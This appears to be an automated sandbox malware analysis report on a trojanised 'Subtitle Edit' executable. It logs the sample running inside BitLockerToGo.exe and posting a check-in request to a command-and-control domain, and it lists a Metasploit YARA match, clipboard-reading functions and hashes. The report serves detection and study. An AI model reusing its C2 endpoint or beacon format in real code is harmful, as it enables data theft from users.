2024-08-29 13:40:23 UTC	824	IN	Data Raw: 31 31 32 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1128<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-29 13:40:23 UTC	1369	IN	Data Raw: 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 Data Ascii: ors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-ale
2024-08-29 13:40:23 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 58 52 75 39 35 73 56 4e 6f 47 6b 53 65 48 61 54 4c 4b 65 36 65 63 5a 56 6b 71 36 63 6e 6c 54 58 74 50 4c 56 34 72 38 57 6d 61 73 2d 31 37 32 34 39 33 38 38 32 33 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 64 64 6f 73 2f 67 6c 6f 73 73 61 72 79 2f 6d 61 6c 77 61 72 65 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 Data Ascii: <input type="hidden" name="atok" value="XRu95sVNoGkSeHaTLKe6ecZVkq6cnlTXtPLV4r8Wmas-1724938823-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/ddos/glossary/malware/" class="cf-btn" style="backgr
2024-08-29 13:40:23 UTC	838	IN	Data Raw: 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 Data Ascii: bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span>
2024-08-29 13:40:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49716	188.114.96.3	443	3992	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 13:40:23 UTC	353	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=XRu95sVNoGkSeHaTLKe6ecZVkq6cnlTXtPLV4r8Wmas-1724938823-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 76 Host: traineiwnqo.shop
2024-08-29 13:40:23 UTC	76	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 6e 35 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63 Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--n5&j=5c9b8674a630d9101b46733aa37f15ec
2024-08-29 13:40:24 UTC	815	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:40:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=atsh3eh75bjegfp6qg2sccpoep; expires=Mon, 23-Dec-2024 07:27:03 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35lZQw2mpFFV9T1H04iBoUKRfM9KLd1odGm0vJxjM2o4CqRpqpo5eNmq8AnS5eLOMc9UPrwjN4xhNzd4tSB1Qxh87gdmPgJrgAheukIbEayA%2FpF58TRjY9CbPIvkOPryRATR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bacf3e0ff384259-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 13:40:24 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-29 13:40:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:40:11
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\0Subtitle Edit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\0Subtitle Edit.exe"
Imagebase:	0xa60000
File size:	18'028'032 bytes
MD5 hash:	C304E6D97F3A59F101484C104132C434
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2283833733.0000000002F1E000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:40:18
Start date:	29/08/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0x580000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	43.4%
Total number of Nodes:	76
Total number of Limit Nodes:	10

Executed Functions

Function 00435EF8 Relevance: 8.1, Strings: 6, Instructions: 585
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%sgh, xrefs: 00436240
@, xrefs: 00435FFD
:U)K, xrefs: 004364D3, 004364A8
4`[b, xrefs: 00436320
bcC, xrefs: 00436350
%sgh, xrefs: 00436170

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: %sgh$%sgh$4`[b$:U)K$@$bcC
API String ID: 2994545307-2112727669
Opcode ID: b5d144f314c2662fa5583cda79013e9df957fe0605692c56ebe624641feb9228
Instruction ID: b5c215e7344e4d1e3942b5c1b480a14c8510d73cef5b03997e00cda5eb2fd1a0
Opcode Fuzzy Hash: b5d144f314c2662fa5583cda79013e9df957fe0605692c56ebe624641feb9228
Instruction Fuzzy Hash: A60266742083429BD314CF08D990A2BBBF2FF8A705F65991EE4C59B391D339D845CB9A

Function 0040C926 Relevance: 5.6, Strings: 4, Instructions: 568
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

s, xrefs: 0040CAEA
us, xrefs: 0040D19C
PQ, xrefs: 0040CA1B
~0, xrefs: 0040D0C8

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: PQ$s$~0$us
API String ID: 0-1729241119
Opcode ID: 92b6d4bfff756f377c6c1701a031c2bd17822f1c5fd609856eeba8f65b243fd3
Instruction ID: e03916a7da5e6ba0c2f8091f46f4f555eff45ce801cd2f5b07f95acf9bdb28f2
Opcode Fuzzy Hash: 92b6d4bfff756f377c6c1701a031c2bd17822f1c5fd609856eeba8f65b243fd3
Instruction Fuzzy Hash: B73263B4518340DFE710DF25E884B6ABBB6FF85300F1699ADE4985B362C7749801CF9A

Function 00433DD2 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 00433E3D

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 908193a484c15671baeb4a38a4b4353498f707b7aacb43765837dcf0fca68e39
Instruction ID: eb20d6f6faef0c722aa8bbd71a1406ec935fcb9b6a2d710ae203e08c584c4237
Opcode Fuzzy Hash: 908193a484c15671baeb4a38a4b4353498f707b7aacb43765837dcf0fca68e39
Instruction Fuzzy Hash: 88014F3410C2808BD309DF18C9A1A2AFBE6EF96705F148A5DD5D6433A1C6359850CB4A

Function 00435DA0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0040EA26,?,00000001,?), ref: 00435DCE

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00435E33 Relevance: 1.5, Strings: 1, Instructions: 244
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4`[b, xrefs: 00436320

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: 955187d182e6d048e01c883de59f737c40fb6c1cc6040005dcec5b4f59e16f57
Instruction ID: 55f62c6f804c7cf4b8bdc42aaed63704e86565d7fc3cb0259a1df8de189eacb3
Opcode Fuzzy Hash: 955187d182e6d048e01c883de59f737c40fb6c1cc6040005dcec5b4f59e16f57
Instruction Fuzzy Hash: 47717A742083429BD708CF04D5A1A2BF7E2FFDA315F65991DE082873A1C339D845CBAA

Function 004367B0 Relevance: .2, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a93e2bfca1d7aa7255c8a95b3e15d5247c32dca99487630a8c543496bfcf4908
Instruction ID: 5ab6b32e41413d5c8c420ceb0bf7328a98a469101a76827d740cdd4aca41d802
Opcode Fuzzy Hash: a93e2bfca1d7aa7255c8a95b3e15d5247c32dca99487630a8c543496bfcf4908
Instruction Fuzzy Hash: CE513874108342ABD308CF14D595A2BBBF2EB8A745F559C1DF09697391C338D848CBAB

Function 0040B270 Relevance: 16.3, APIs: 2, Strings: 7, Instructions: 516
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(6BF36DE7,00000000,00000800), ref: 0040B312
GetProcessVersion.KERNEL32(00000000), ref: 0040B515

Strings

JBNJ, xrefs: 0040B69B
IXY , xrefs: 0040B683
@VCL, xrefs: 0040B6AB
traineiwnqo.shop, xrefs: 0040B749, 0040B934
mBXZ, xrefs: 0040B693
OO[R, xrefs: 0040B6A3
XMS, xrefs: 0040B67B

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoadProcessVersion
String ID: @VCL$IXY $JBNJ$OO[R$XMS$mBXZ$traineiwnqo.shop
API String ID: 1829952579-883954736
Opcode ID: 373a0f9e22c94c5bae2a4f5218bb5401487035fb1ccb6e8811359d5ff006948c
Instruction ID: 064b0f1f99778e1a1520897e318e5f958ceea2eaa0b073473360c069028d18cb
Opcode Fuzzy Hash: 373a0f9e22c94c5bae2a4f5218bb5401487035fb1ccb6e8811359d5ff006948c
Instruction Fuzzy Hash: 4D02C0B45083408FD310EF15D99166ABBE1EF92304F54893EE4C5AB3A2E3798905CF9E

Function 004350B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 250
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

sV>, xrefs: 00435244
f[C, xrefs: 00435451
sV>, xrefs: 00435634

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: f[C$sV>$sV>
API String ID: 0-1742038981
Opcode ID: dca4f72511be7345964931585ac2be24a3dab814cca54a8cdd4b1995ec398d1a
Instruction ID: 459b7a90221e3825e19f6dcee74ee2924d5d68c1ab25a9685ba17e356392434e
Opcode Fuzzy Hash: dca4f72511be7345964931585ac2be24a3dab814cca54a8cdd4b1995ec398d1a
Instruction Fuzzy Hash: CEA1D47E6241A4DFCB145F7CF9911AEB7B1AB4F352F5A0CB4C44293260E3398A86CB54

Function 0040A100 Relevance: 6.2, APIs: 4, Instructions: 211
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0040A28F

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: CurrentProcess
String ID:
API String ID: 2050909247-0
Opcode ID: 6cbb73408acb59ed4db33d4775c4bf5a2e1f5fb954a14be8ea85e258cb4c0f60
Instruction ID: 51fbb555b9d370e3692862816e476a2db59de2d609e19ce943ac933125e09400
Opcode Fuzzy Hash: 6cbb73408acb59ed4db33d4775c4bf5a2e1f5fb954a14be8ea85e258cb4c0f60
Instruction Fuzzy Hash: EC71913861C340CBCB099F78C16853A7BD1AB91348F51457FA8876F3E0D67C9826AB5B

Function 0040D790 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(6BF96DD3,00000104), ref: 0040DBED

Strings

traineiwnqo.shop, xrefs: 0040DBBC
TO, xrefs: 0040DB0E

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: DirectorySystem
String ID: TO$traineiwnqo.shop
API String ID: 2188284642-2601519300
Opcode ID: da7659f039d2ad96d09439b61ecaa174c4a5b71ef2348cafbeb49aa824987ee6
Instruction ID: 2cdc23b5d7e5385279bec43498292fa0782ce986dca6051d641f96f7d62c1df6
Opcode Fuzzy Hash: da7659f039d2ad96d09439b61ecaa174c4a5b71ef2348cafbeb49aa824987ee6
Instruction Fuzzy Hash: 35B179B05093D08BE3318F25C594B9FBBE2AB8A704F148A6DD8C86B251C7349949CB97

Function 0042E2D4 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 0042E2FB

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 785eed544a71601c7ff247a2735b5923dff7dc13dbc77ca95f9a9498ffca1817
Instruction ID: dd10b1c294a43226da38dd84dd8e9094d7a49cf7fdc57e15a8758e2ba235be4e
Opcode Fuzzy Hash: 785eed544a71601c7ff247a2735b5923dff7dc13dbc77ca95f9a9498ffca1817
Instruction Fuzzy Hash: 59219A70A056988FCB24CB2CED907ADBBB2AF5A311F5442DCE48AA7391C7315E41CF59

Function 00433D50 Relevance: 1.5, APIs: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00433DAF

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8280a75a012a00ceeaeac738caeb7817f92d77213325f8f085cb60bee0523abc
Instruction ID: 9f412bbd7a6109a0698dafb4fec176d59e0e2d40232d6bcdd9cf284ac7ff1406
Opcode Fuzzy Hash: 8280a75a012a00ceeaeac738caeb7817f92d77213325f8f085cb60bee0523abc
Instruction Fuzzy Hash: 14F0F47420C2409BD305EF18D990A1ABBF1EF9A744F14892DE4C587362C335E825CF5A

Non-executed Functions

Function 0041DA50 Relevance: 21.6, APIs: 1, Strings: 11, Instructions: 638COMMON

Download Yara Rule

Strings

' 8?, xrefs: 0041EA0D
4`[b, xrefs: 0041EB30
4`[b, xrefs: 0041E5C0
de, xrefs: 0041E74E
t, xrefs: 0041E877
"A, xrefs: 0041E915
<r, xrefs: 0041E887
Ev, xrefs: 0041E39C
zC, xrefs: 0041E3A4
HU, xrefs: 0041E3AC
"A, xrefs: 0041E815

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "A$"A$' 8?$4`[b$4`[b$<r$Ev$HU$de$t$zC
API String ID: 0-3251056379
Opcode ID: b9a61e52cc33f86d36d7462e6d02dc9443a2df4ed359597ac9cc5ffa6758908e
Instruction ID: c29d10d54293dc5b770cf99709fc0a62859e1673d9a367d2a7c97bb10d966738
Opcode Fuzzy Hash: b9a61e52cc33f86d36d7462e6d02dc9443a2df4ed359597ac9cc5ffa6758908e
Instruction Fuzzy Hash: 2D22B8B4608340DFE3149F19E891A2ABBF1FF86344F50592DE5C68B3A2D739D845CB4A

Function 0041B4F6 Relevance: 18.5, Strings: 14, Instructions: 983COMMON

Download Yara Rule

Strings

!i:o, xrefs: 0041BCA3
MzO, xrefs: 0041BBE6
4`[b, xrefs: 0041C4D0
rEpG, xrefs: 0041BBD2
@w, xrefs: 0041B765
xi, xrefs: 0041B76C
4`[b, xrefs: 0041BE90
}s, xrefs: 0041BC8E
d`, xrefs: 0041B75E
xQiS, xrefs: 0041BBF0
X!f#, xrefs: 0041BB8A
/.)(, xrefs: 0041C455
d`, xrefs: 0041B93C, 0041BACC, 0041BC5C
}q, xrefs: 0041B773

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: MzO$!i:o$/.)($4`[b$4`[b$@w$X!f#$d`$d`$rEpG$xQiS$xi$}q$}s
API String ID: 0-1556430234
Opcode ID: 6076612a897a12d104e5074aa5674c30907ccbe44cc882393121aa00518ad4c5
Instruction ID: 9e8b14699c5b30ea174a490e5dddac6aaefe3e7e215f63537efc2ac8c3160455
Opcode Fuzzy Hash: 6076612a897a12d104e5074aa5674c30907ccbe44cc882393121aa00518ad4c5
Instruction Fuzzy Hash: 9D9275B490025ACFDB18CF54D890AAAFBB1FF4A300F1896A9D455AF752D7349882CFD4

Function 0042AAD0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 105clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0042AAE4
GetWindowLongW.USER32 ref: 0042AB09
GetClipboardData.USER32 ref: 0042AB19
GlobalLock.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DFAE,?), ref: 0042AB38
GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DFAE), ref: 0042AC28
CloseClipboard.USER32 ref: 0042AC33

Strings

w, xrefs: 0042AB87
G, xrefs: 0042AB96
[, xrefs: 0042AB69
v, xrefs: 0042AB7D

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: G$[$v$w
API String ID: 2832541153-2409301185
Opcode ID: ca94ac31f7a09391d2a8d2c45d84298f993af000aef7aa26afde120bdfd5f4f7
Instruction ID: 97b8e6c4317eaaa1647a8c533210da23301b94b957612e97d1362c7603054ef9
Opcode Fuzzy Hash: ca94ac31f7a09391d2a8d2c45d84298f993af000aef7aa26afde120bdfd5f4f7
Instruction Fuzzy Hash: 1A41B07050C7918FD310AF38948832FBFE19B96314F044A2DE4DA47291C7389559CB9B

Function 00402A20 Relevance: 16.9, Strings: 13, Instructions: 602COMMON

Download Yara Rule

Strings

0, xrefs: 00402AB9
., xrefs: 00402ABF
}, xrefs: 00402D04
false, xrefs: 00402B45
{, xrefs: 00402C9B
null, xrefs: 00402BE8
}, xrefs: 00403054
,, xrefs: 00402F35
], xrefs: 00402DEB
true, xrefs: 00402B2D
., xrefs: 00402AE4
,, xrefs: 0040302C
[, xrefs: 00402DB9

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: ,$,$.$.$0$[$]$false$null$true${$}$}
API String ID: 0-3096720393
Opcode ID: d52efc0a24ef29bebffac5565548034d6611479776eaeb195baa045e66cd700f
Instruction ID: 6df730f072f63e2d9fc300100cb3c50d51b018d891c432def89b0ebfd95a088f
Opcode Fuzzy Hash: d52efc0a24ef29bebffac5565548034d6611479776eaeb195baa045e66cd700f
Instruction Fuzzy Hash: F80219B09043069BD7206F26DD497277BE8BF44309F14443AE889A63D3EB7DE905CB5A

Function 0040DDAC Relevance: 15.8, Strings: 12, Instructions: 848COMMON

Download Yara Rule

Strings

F, xrefs: 0040DFF3
*M.O, xrefs: 0040E7D7
$iHk, xrefs: 0040E2D7
traineiwnqo.shop, xrefs: 0040E488
95, xrefs: 0040DDAC
DCFM, xrefs: 0040E127
AC, xrefs: 0040E7E2
qs, xrefs: 0040E773
!Y.[, xrefs: 0040E2AB
D, xrefs: 0040E936
(, xrefs: 0040DFEC
4`[b, xrefs: 0040E9FF

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID: MetricsSystem
String ID: !Y.[$$iHk$($*M.O$4`[b$95$D$DCFM$F$traineiwnqo.shop$AC$qs
API String ID: 4116985748-104136832
Opcode ID: 76b5ef2f8b4400fbee944530aff6203b8919b89795f7df8875e5bb5f25088c18
Instruction ID: 8950852e522b04e10fe1dd3b982c53cbba2b4e32fe8a9b07e8c12ca551aff0d5
Opcode Fuzzy Hash: 76b5ef2f8b4400fbee944530aff6203b8919b89795f7df8875e5bb5f25088c18
Instruction Fuzzy Hash: 9562AAB01093808BE324DF16D495B9FBBE1AFC6308F148D2DE4C95B292C7399955CB9B

Function 00419FFF Relevance: 13.0, APIs: 1, Strings: 6, Instructions: 767COMMON

Download Yara Rule

Strings

|!;%, xrefs: 0041A0D8
1u& , xrefs: 0041A0C8
1=3!, xrefs: 0041A0D0
: $<, xrefs: 0041A0C0
/.)(, xrefs: 0041A8C8
/.)(, xrefs: 0041A056

Memory Dump Source

Source File: 00000002.00000002.2319463864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: /.)($/.)($1=3!$1u& $: $<$|!;%
API String ID: 0-1222258971
Opcode ID: a2b923ffa6b332d4a3c247d1da566372a93b9be2640f0db65b8054cfd4f436cb
Instruction ID: 2c3a4e4d248b2d077a457603f0eb431a2e8ecc1289d5e5cc3d1cdba081647b06
